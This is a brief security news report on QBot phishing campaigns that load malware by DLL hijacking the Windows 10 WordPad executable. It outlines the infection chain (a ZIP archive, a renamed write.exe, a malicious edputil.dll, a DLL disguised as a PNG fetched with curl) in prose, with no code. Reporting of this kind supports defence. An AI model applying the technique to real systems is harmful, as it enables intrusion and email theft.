BleepingComputer reports that recent phishing attacks by the QBot malware operation, also known as Qakbot, have involved the exploitation of a DLL hijacking flaw in the Windows 10 WordPad executable "write.exe."
Phishing emails sent by the operation include links for downloading a file, which when clicked would result in the download of a randomly-named ZIP archive with the WordPad executable "document.exe" and the "edputil.dll" file for DLL hijacking, according to Cryptolaemus member and security researcher ProxyLife. Launching "document.exe" would trigger the loading of the legitimate "edputil.dll" file, but any DLL of the same name would eventually be loaded, enabling DLL hijacking. After the downloading of a PNG file-masquerading DLL, QBot will then be allowed to exfiltrate emails and facilitate further payload deployment.
While using Windows 10 WordPad to install QBot has helped evade detection by security software, the attack's use of curl.exe would only mean functional attacks in machines running on Windows 10 and later, said ProxyLife.